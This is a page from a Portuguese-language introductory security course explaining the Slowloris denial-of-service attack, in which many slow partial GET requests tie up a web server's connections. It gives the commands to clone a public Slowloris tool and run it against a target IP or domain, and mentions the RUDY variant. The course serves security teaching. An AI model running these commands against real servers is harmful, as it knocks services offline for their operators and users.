📖
📖
📖
📖
Introducao à segurança digital
Search…
📖
📖
📖
📖
Introducao à segurança digital
Introdução à Segurança Digital
Introdução a Linux
Criptografia
Redes
Ataques
Arp Cache Poisoning
DNS Cache Poisoning
Slow Loris
Syn Flood
WPA Cracking
Ferramentas
Pacote & Protocolo
Camada de Rede
Camada de Transporte
IANA
Three-way Handshake
DHCP
DNS
NAT
Pentest
Avançado
Web
CTF
Engenharia Reversa
Pwning
Hardware
Powered By GitBook
Slow Loris
A ideia por trás do Slow Loris é abrir várias conexões TCP com um servidor web e, em cada uma delas, enviar de tempos em tempos uma parte de uma requisição GET. O servidor acha que as conexões estão lentas, mas que são legítimas, então ele as mantêm, impedindo outras conexões de usuários comuns.
Para esse ataque, vamos usar esse código maravilindo. Primeiro clonamos o repositório:
1
$ git clone https://github.com/gkbrk/slowloris
Copied!
Depois entramos no repositório clonado:
1
$ cd slowloris
Copied!
Obs: É possível que você precise especificar um caminho diferente ao cd, dependendo da pasta para onde o repositório foi clonado e da pasta onde você está.
Finalmente, basta usar o python para executar o código, passando o IP do alvo (nesse caso, nosso alvo é 10.10.10.10):
1
$ python3 slowloris.py 10.10.10.10
Copied!
Ou apenas o domínio, caso exista:
1
$ python3 slowloris.py example.com
Copied!
Obs: Existe uma outra versão do Slow Loris que se chama R U Dead Yet, que envia requisições POST ao invés de GET.
Previous
DNS Cache Poisoning
Next
Syn Flood
Last modified 2yr ago
Copy link